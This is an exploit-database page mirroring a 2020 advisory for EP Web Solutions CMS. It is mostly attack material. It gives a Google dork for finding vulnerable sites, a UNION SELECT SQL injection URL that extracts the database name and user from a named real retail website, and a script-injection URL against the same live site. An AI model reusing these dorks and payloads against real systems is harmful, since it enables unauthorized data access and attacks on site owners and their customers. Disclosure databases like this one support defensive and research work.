Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090139

Below is a copy:

EP Web Solutions CMS SQL Injection and XSS Vulnerability
#Exploit Title: EP Web Solutions CMS  SQL Injection and XSS Vulnerability 
#Date: 2020-09-28
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: evergreenparkweb.com
#Google Dork: intext:"EPweb " or " Evergreen Park Web"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: evergreenparkweb.com
 
SQL Injection
Demo: https://www.martinellischildrenswear.com/product_details.php?ID=-890%27%20UNION%20SELECT%201,database()%20,user(),4,5,6,7,8,9,10,11,12,13,14--%20-
################################################################################
Cross Site Scripting (XSS)
Demo:https://www.martinellischildrenswear.com/shop.php?search=%22/%3E%3Cscript%3Ealert`PywebSecurity`%3C/script%3E


********************************************************* 
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.